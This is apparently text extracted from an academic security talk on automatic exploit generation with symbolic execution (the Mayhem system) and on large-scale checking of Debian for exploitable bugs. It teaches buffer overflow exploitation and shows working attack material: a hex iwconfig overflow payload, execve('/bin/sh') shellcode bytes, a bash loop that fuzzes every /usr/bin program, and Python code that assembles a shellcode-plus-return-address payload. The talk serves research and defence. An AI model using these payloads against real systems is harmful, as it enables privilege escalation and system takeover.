Checking the World’s Software for Exploitable Bugs

David Brumley

Carnegie Mellon University

http://security.ece.cmu.edu/

An epic battle

Black

White

vs.

format c:

Exploit bugs

Bug

Black

White

format c:

OK

Exploit

$ iwconfig accesspoint

$ iwconfig

#

01ad 0101 0101 0101 0101 0101 0101 0101 0101 0101 0101 0101 0101 0101 0101 0101 0101 0101 fce8 bfff 0101 0101 0101 0101 0101 0101 0101 0101 0101 0101 0101 0101 0101 0101 0101 3101 50c0 2f68 732f 6868 622f 6e69 e389 5350 e189 d231 0bb0 80cd

Superuser

Bug Fixed!

Black

White

format c:

inp=`perl -e '{print "A"x8000}'`
for program in /usr/bin/*; do
  for opt in {a..z} {A..Z}; do
    timeout -s 9 1s $program -$opt $inp
  done
done

1009 Linux programs. 13 minutes. 52 new bugs in 29 programs.

DEF CON 2012 scoreboard

CMU

Time (3 days total)

I skate to where the puck is going to be,

not where it has been.

Wayne Gretzky, Hockey Hall of Fame

White

Our Vision: Automatically Check the World’s Software for Exploitable Bugs

Verification, but with a twist

Correct / Safe paths

Verification

Program

Incorrect

Exploit

Correctness Property / Un-exploitability Property

33,248 programs, 152 new exploitable bugs

Outline
  • Basic exploitation
  • Symbolic execution for exploit generation
  • Automatic exploit generation on real code
  • Experiments
  • Related projects and the future
Control flow hijack

attacker gains control of execution

  • buffer overflow
  • format string attack
  • heap metadata overwrite
  • use-after-free
  • ...

Same principle, different mechanism

Basic execution semantics of compiled code

Process Memory

Instruction Pointer points to next instruction to execute

Fetch, decode, execute

Code

Processor

EIP

Data

...

...

Stack

Heap

Control Flow Hijack:

EIP = Attacker Code

read and write

Buffer overflows and the runtime stack

int vulnerable(char *input)
{
  char buf[32];
  int x;
  if(...){
    x = 1;
  } else {
    x = 0;
  }
  strcpy(buf,input);
  return x;
}

local variables

Control flow hijack when

input length > buffer length

execution semantics, including call/return

lower addresses

locals allocated on stack

vulnerable’s initial stack frame

int vulnerable(char *input)
{
  char buf[32];
  int x;
  ...
  strcpy(buf,input);
  return x;
}

input = “ABC\0”

lower addresses

Writes go up!

writes

ABC\0

int vulnerable(char *input)
{
  char buf[32];
  int x;
  ...
  strcpy(buf,input);
  return x;
}

“return address”

caller(){
  i:   vulnerable(input);
  i+1: ...

saved eip

lower addresses

ABC\0

int vulnerable(char *input)
{
  char buf[32];
  int x;
  ...
  strcpy(buf,input);
  return x;
}

Processor

EIP

A buffer overflow occurs when data is written outside of the space allocated for the buffer.
  • C does not check that writes are in-bound

writes

Classic Exploit: overwrite saved EIP
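The overwrite can be modelled without touching real memory. The sketch below treats the stack frame as a byte array and assumes a hypothetical layout of buf (32 bytes), x (4), saved EBP (4), and saved EIP (4) in increasing address order; real compilers may order and pad locals differently, and all names here are illustrative.

```python
import struct

# Hypothetical frame layout, low to high addresses; real layouts vary by compiler.
OFF_BUF, OFF_X, OFF_EBP, OFF_EIP = 0, 32, 36, 40
FRAME_SIZE = 44

def new_frame(return_address):
    """Build a zeroed frame that holds the caller's return address."""
    frame = bytearray(FRAME_SIZE)
    struct.pack_into("<I", frame, OFF_EIP, return_address)
    return frame

def unchecked_strcpy(frame, data):
    """Copy data plus a NUL terminator into buf with no bounds check, like strcpy."""
    payload = data + b"\x00"
    # A real overflow keeps writing past the frame; this model stops at its edge.
    payload = payload[:FRAME_SIZE - OFF_BUF]
    frame[OFF_BUF:OFF_BUF + len(payload)] = payload

def saved_eip(frame):
    """Read back the 32-bit little-endian saved return address."""
    return struct.unpack_from("<I", frame, OFF_EIP)[0]

short = new_frame(0x08048000)
unchecked_strcpy(short, b"ABC")          # fits in buf, return address intact

long = new_frame(0x08048000)
unchecked_strcpy(long, b"A" * 40 + struct.pack("<I", 0xBFFFFCE8))
```

With the short input the saved EIP is unchanged; with the 44-byte input it now holds the attacker-chosen value.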

Traditionally we show exploitability by running shellcode

* More advanced methods, like Return-Oriented Programming, can also be automatically generated in our research

Shellcode is a string

execve("/bin/sh", 0, 0);

Compile

\x31\xc9\xf7\xe1\x51\x68\x2f\x2f

\x73\x68\x68\x2f\x62\x69\x6e\x89

\xe3\xb0\x0b\xcd\x80

Executable String

Author: kernel_panik, http://www.shell-storm.org/shellcode/files/shellcode-752.php

input = shellcode . address of buf

&buf

\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f...

int vulnerable(char *input)
{
  char buf[32];
  int x;
  ...
  strcpy(buf,input);
  return x;
}

&buf

Processor

EIP

input = shellcode . address of buf

Owned!

%eip =

execve(“/bin/sh”, NULL)

&buf

\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f...

int vulnerable(char *input)
{
  char buf[32];
  int x;
  ...
  strcpy(buf,input);
  return x;
}

&buf

Processor

EIP
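The input on these slides can be assembled mechanically. The following is a minimal sketch, assuming the saved EIP sits 40 bytes above the start of buf and that buf lives at the example address 0xbffffce8; both values are illustrative assumptions, and `build_input` is a hypothetical helper name.

```python
import struct

# Shellcode bytes as printed on the "Shellcode is a string" slide.
SHELLCODE = bytes.fromhex(
    "31c9f7e151682f2f"
    "7368682f62696e89"
    "e3b00bcd80"
)

def build_input(buf_addr, eip_offset=40):
    """Return shellcode, filler up to the saved EIP, then buf's address."""
    filler = b"A" * (eip_offset - len(SHELLCODE))
    payload = SHELLCODE + filler + struct.pack("<I", buf_addr)
    # strcpy stops at the first NUL byte, so the payload must not contain one.
    if b"\x00" in payload:
        raise ValueError("payload contains a NUL byte and would be truncated")
    return payload

payload = build_input(0xBFFFFCE8)  # example address, assumed for illustration
```

When the function returns, the processor loads the overwritten saved EIP, which points back at the start of buf where the shellcode now sits.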

Verification, but with a twist

Correct / Safe path

Verification

Program

Incorrect

Exploitable

Correctness Property / Un-exploitability Property

We use symbolic execution to test paths [Boyer75, Howden75, King76]

Basic symbolic execution

x = input()

x can be anything

x > 42

if x > 42

t

f

(x > 42)

∧ (x*x != MAXINT)

if x*x = MAXINT

t

f

(x > 42)

∧ (x*x != MAXINT)

∧ !(x < 42)

jmp stack[x]

if x < 42

t

f

x = input()

x can be anything

x > 42

if x > 42

Path formula (true for inputs that take path)

t

f

(x > 42)

∧ (x*x != MAXINT)

if x*x = MAXINT

t

f

(x > 42)

∧ (x*x != MAXINT)

∧ !(x < 42)

jmp stack[x]

if x < 42

t

f

Basic symbolic execution

Satisfiable (x = 43)

x = input()

path test case!

Satisfiability Modulo Theories (SMT) Solver

if x > 42

t

f

if x*x = MAXINT

t

f

(x > 42)

∧ (x*x != MAXINT)

∧ !(x < 42)

jmp stack[x]

if x < 42

t

f

Basic symbolic execution

UNSAT (infeasible)

x = input()

SMT Solver

if x > 42

t

f

if x*x = MAXINT

t

f

(x > 42)

∧ (x*x != MAXINT)

∧ (x <= 42)

jmp stack[x]

if x < 42

t

f
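The two solver outcomes on these slides can be reproduced with a toy search. The sketch below uses a brute-force loop over a small range as a stand-in for an SMT solver, so a result of None only means "no solution in the searched range" rather than a proof of unsatisfiability; MAXINT is assumed to be 0xFFFFFFFF, and `solve` is a hypothetical helper.

```python
MAXINT = 0xFFFFFFFF  # assumed 32-bit value

def solve(constraints, domain=range(0, 1000)):
    """Brute-force stand-in for an SMT solver: return a satisfying x or None."""
    for x in domain:
        if all(check(x) for check in constraints):
            return x
    return None

# Path formula of the feasible path: every branch condition along the path.
feasible_path = [
    lambda x: x > 42,
    lambda x: x * x != MAXINT,
    lambda x: not (x < 42),
]

# Same prefix, but the last condition contradicts x > 42.
infeasible_path = [
    lambda x: x > 42,
    lambda x: x * x != MAXINT,
    lambda x: x <= 42,
]

print(solve(feasible_path))    # 43
print(solve(infeasible_path))  # None
```

The satisfying assignment doubles as a test case: running the program on x = 43 drives execution down exactly that path.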

Checking non-exploitability

x = input()

Un-exploitability property:

EIP != user input

if x > 42

t

f

(x > 42)

∧ (x*x == MAXINT)

∧ Un-exploitable

if x*x = MAXINT

t

f

jmp stack[x]

if x < 42

t

f

Checking non-exploitability

SAT (safe)

UNSAT (exploit)

SMT

EIP != user input

For each path

Real world exploit generation: a brief history

Ours

Others

And >150 papers on symbolic execution

Exploiting Real Code: The Mayhem Architecture

Principles:

Require only the binary, e.g., BAP, our binary analysis platform

Use intelligent analysis to reduce state space, e.g., preconditioned symbolic execution

Make queries to SMT as easy as possible, e.g., symbolic memories

Potentially infinite state space

strcpy(buf, input);

if (input[0] != 0)

if (input[1] != 0)

if (input[n] != 0)

t

t

t

f

f

f

while(input[i] != 0){
  buf[i] = input[i]; i++;
}
buf[i] = 0;
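Each iteration of the copy loop forks the symbolic state once, so the number of paths grows with the input length and has no bound when the length is unbounded. A minimal sketch that lists the path formula for each loop exit up to a chosen bound (`strcpy_paths` is a hypothetical name):

```python
def strcpy_paths(max_len):
    """List the path formula for each possible exit of the copy loop."""
    paths = []
    prefix = []  # conditions for having stayed in the loop so far
    for i in range(max_len + 1):
        # Exiting at iteration i: all earlier bytes non-zero, byte i is zero.
        paths.append(" and ".join(prefix + [f"input[{i}] == 0"]))
        prefix.append(f"input[{i}] != 0")
    return paths

for formula in strcpy_paths(2):
    print(formula)
```

Raising the bound by one always adds one more path, which is why blind exploration of long inputs is slow.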

Check every branch blindly

if (input[0] != 0)

if (input[1] != 0)

if (input[n] != 0)

20 min exploration

t

t

t

f

f

f

30 min exploration

x min exploration

Exploitable bug found

KLEE [Cadar’08] does this

Preconditioned symbolic execution

All Inputs

Trigger bug

Preconditions focus search, e.g.: input > len

Control Hijack

input vs bugs doesn’t typecheck

other examples in [Avgerinos11]

Static and online analysis determines likely exploit conditions
  • 40 bytes
  • All non-NULL

char buf[32];

int x;

...

strcpy(buf, input);

Example: length precondition

Precondition Check:

length(input) > 40

∧ input[0] == 0

Unsatisfiable

if (input[0] != 0)

if (input[1] != 0)

if (input[n] != 0)

Unsatisfiable

Not explored. Saved 20 min

t

t

t

f

f

f

Precondition Check:

length(input) > 40

∧ input[1] == 0

Not explored. Saved 30 min

Not explored. Saved x min

Exploitable bug found
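The pruning shown here follows from a simple observation: on the path that leaves the copy loop at index i, the input has length exactly i, so the precondition length(input) > 40 rules that path out whenever i <= 40. A sketch of this check, with the hypothetical helper `split_exits`:

```python
def split_exits(max_len, min_len_exclusive=40):
    """Partition loop-exit indices into explored and pruned under the precondition."""
    explored, pruned = [], []
    for i in range(max_len + 1):
        # Exit at i means input[i] == 0, i.e. length(input) == i.
        if i > min_len_exclusive:
            explored.append(i)   # compatible with length(input) > bound
        else:
            pruned.append(i)     # precondition ∧ input[i] == 0 is unsatisfiable
    return explored, pruned

explored, pruned = split_exits(43)
```

With a bound of 43 bytes, 41 of the 44 exits are discarded before any exploration time is spent on them.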

Don’t treat as a black box!

SAT. (x = 43)

SMT Solver

“program” the SMT

(x > 42)

∧ (x*x != 0xffffffff)

∧ !(x < 42)

Symbolic memory indices

x can be anything

x := user_input();

y := mem[x];

assert(y = 42);

vulnerable();

Which memory cell contains 42?

2^32 cells to check

0

Memory

2^32 - 1

Symbolic addresses occur often

Other causes

  • Parsing: sscanf, vfprintf, etc.
  • Character test: isspace, isalpha, etc.
  • Conversion: toupper, tolower, mbtowc, etc.

c = get_char();

...

to_lower(c);

to_lower(char c){
  c >= -128 && c < 256 ? tbl[c] : c;
}

tbl + 'A'

Address is symbolic

Concretization: test case generation

e.g., SAGE, DART, CUTE, KLEE

x := user_input();

y := mem[30];

assert(y = 42);

vulnerable();

Misses over 40% of exploits

1 cell to check

0

30

Memory

2^32 - 1
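The trade-off between the two approaches can be seen on a toy memory. The sketch below assumes a 256-cell memory with the value 42 stored at a hypothetical index 7: checking only the concretized index 30 misses the cell, while considering every index finds it at the cost of scanning the whole memory.

```python
MEM_SIZE = 256  # toy memory; the slides' address space has 2**32 cells

def concretized_check(mem, concrete_index, want=42):
    """Test only the single index the concrete run happened to use."""
    return mem[concrete_index] == want

def symbolic_check(mem, want=42):
    """Consider every index x and return those with mem[x] == want."""
    return [x for x in range(len(mem)) if mem[x] == want]

mem = [0] * MEM_SIZE
mem[7] = 42  # hypothetical location of the interesting cell

print(concretized_check(mem, 30))  # False: the vulnerable call looks unreachable
print(symbolic_check(mem))         # [7]: x = 7 reaches vulnerable()
```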

Observation

f

t

x can be anything

Path formula constrains range of symbolic memory accesses

f

t

x > 0

x < 5

0 < x < 5

y = mem[x]

assert(y==42)

Use symbolic execution state to:

Step 1: Bound memory addresses referenced

Step 2: Reduce to linear formulas

Piecewise linear equations

know: 0 < x < 5

y = mem[x]

[Figure: memory Value plotted against Index, covered by two line segments, y = 2*x + 10 and y = -2*x + 28]

40% more exploits (strength reduction)
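One way to picture the reduction: once the path formula bounds x to 1..4, the lookup mem[x] can be replaced by a few linear expressions in x. The sketch below greedily groups consecutive cells with a constant slope. The cell values 12, 14, 22, 20 are assumptions chosen to match the two equations on the slide, and the greedy grouping is an illustrative simplification rather than Mayhem's actual algorithm.

```python
def linear_pieces(lo, values):
    """Cover values[k] = mem[lo + k] with runs (first, last, slope, intercept)."""
    pieces = []
    i, n = 0, len(values)
    while i < n:
        j, slope = i, 0
        if i + 1 < n:
            slope = values[i + 1] - values[i]
            j = i + 1
            # Extend the run while the next cell continues the same slope.
            while j + 1 < n and values[j + 1] - values[j] == slope:
                j += 1
        first = lo + i
        pieces.append((first, lo + j, slope, values[i] - slope * first))
        i = j + 1
    return pieces

def lookup(pieces, x):
    """Evaluate mem[x] through the linear pieces instead of a table read."""
    for first, last, slope, intercept in pieces:
        if first <= x <= last:
            return slope * x + intercept
    raise IndexError(x)

values = [12, 14, 22, 20]           # assumed contents of mem[1..4]
pieces = linear_pieces(1, values)   # [(1, 2, 2, 10), (3, 4, -2, 28)]
```

The solver then reasons about two linear constraints guarded by range checks rather than about an arbitrary memory read.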

Experiments with Mayhem
  • Known exploitable bugs
  • Coverage for 997 programs
  • Checking Debian
[Cha et al, NDSS’12]

Windows

2 Unknown Bugs: FreeRadius, GnuGol

Linux

coverage

50% on average tested

50% unchecked

  • Code coverage measures percentage of statements executed at least once by symbolic executor
  • Mayhem coverage measured on 997 programs compiled with gcov from /usr/bin and /bin
Unique code lines covered

total unique lines (all programs): 2,245,632

lines covered (all programs): 437,455

absolute coverage: 19.48%
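The absolute figure is the pooled ratio of covered lines to total lines, which can differ from the roughly 50% per-program average because large programs dominate the pooled count. A quick check of the arithmetic, using only the two totals above:

```python
total_lines = 2_245_632    # total unique lines (all programs)
covered_lines = 437_455    # lines covered (all programs)

coverage = 100 * covered_lines / total_lines
print(f"{coverage:.2f}%")  # 19.48%
```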


Achieving 100% impossible due to dead code and other factors

Checking Debian

33,248 programs

2,727 days CPU time

15,914,407,892 SMT queries

199,685,594 test cases

2,365,154 crashes

11,690 unique bugs

152 new exploits

public data

http://forallsecure.com/summaries

mining data

Q: How long do queries take on average?

A: 3.67 ms on average with 0.34 variance

Q: Should I optimize hard or easy formulae?

A: 99.99% take less than 1 second and account for 78% of total time

Q: Do queries get harder?

A: Good question...

optimize fast queries

500 sec timeout

No dominant upward trend in time to solve

hardness is (likely) localized

Sym Exe. Thread

Depth 0(Pointer Res.)

Hard Query

Depth 1

Depth 2

Only 39 programs create hard formulas

a/10 replaced with (a*0xcccccccd) >> 3
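This rewrite is the standard compiler trick of turning division by a constant into a multiplication. The sketch below assumes the slide's ">> 3" applies to the upper 32 bits of the 64-bit product, which is how the instruction sequence is usually emitted for unsigned 32-bit values; that reading is an assumption, and `div10` is a hypothetical name.

```python
MAGIC = 0xCCCCCCCD  # ceil(2**35 / 10)

def div10(a):
    """Unsigned 32-bit a // 10 computed with a multiply and shifts only."""
    assert 0 <= a < 2**32
    high = (a * MAGIC) >> 32  # upper 32 bits of the 64-bit product
    return high >> 3

samples = [0, 1, 9, 10, 19, 99, 100, 123456789, 2**31, 2**32 - 1]
print(all(div10(a) == a // 10 for a in samples))  # True
```

The result is the same as a plain division, but the solver is handed a wide multiplication by a large constant instead.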

We are not perfect
  • We don’t claim to find all exploitable bugs
  • “Exploitable” vs. “safe” is with respect to a fixed input size
  • Better symbolic execution

But each report is actionable.

symbolic execution thrusts

1. Formalize Exploit: control flow hijack, information leaks, command injection

2. Binary Program Verification: path merging, faster SMT

3. Real Code: handle messy details, transactional rollback

the larger pipeline

15,546 vulns [Jang12]

BAP [Brumley11], Decompiler [Schwartz13]

2 year total: 27,659 bugs

15,698 vulns

Triage

Program Analysis

static analysis

unpatched code clones

fuzzing

symbolic execution

scheduling

Check OS Distribution

Weighted coupon bug collecting with randomized MAB algs. 1.55x more bugs [Woo13]

Mayhem 11,690 bugs, 152 exploits [Cha11,Avgerinos12]

we’re not even close to done

Breaking the Satisfiability Barrier

(NSF, with Tinelli and Barrett)

  • And others:
  • SMT Hardness (w/ Williams)
  • Exploiting multi-core for behavior-based detection and repair (NSF, w/ Mutlu, Mowry)
  • Vetting commodity systems (DARPA, w/ Gligor, Jaeger)
  • ....

Refinement-Based Component Analysis for Binary Code (DARPA, with Engler)

High School Hacking Competition

White

Our Vision: Automatically Check the World’s Software for Exploitable Bugs

It seems wrong to not try.

Thank You!

Questions?

Credits

Postdocs: Manuel Egele, Maverick Woo

PhD Students: Thanassis Avgerinos, Tiffany Bao, Sang Kil Cha, Peter Chapman, Samantha Gottlieb, Jiyong Jang, Matt Maurer, Alex Rebert, Ed Schwartz, Jonathan Burket

Undergrads: David Kohlbrenner, Tyler Nighswander, Brian Pak

Collaborators: Robert Brumley, Jonathan Diamond, Brent Ledvina

Special Thanks: Coherent Navigation, Mike Carns, Pete Kind, Barbara McNamara

Funding: Core Security, DARPA, Google, Lockheed Martin, Northrop Grumman, NSA, NSF, SEI, ODNI, Symantec, Microsoft, Wiley, Pearson, Amazon AWS
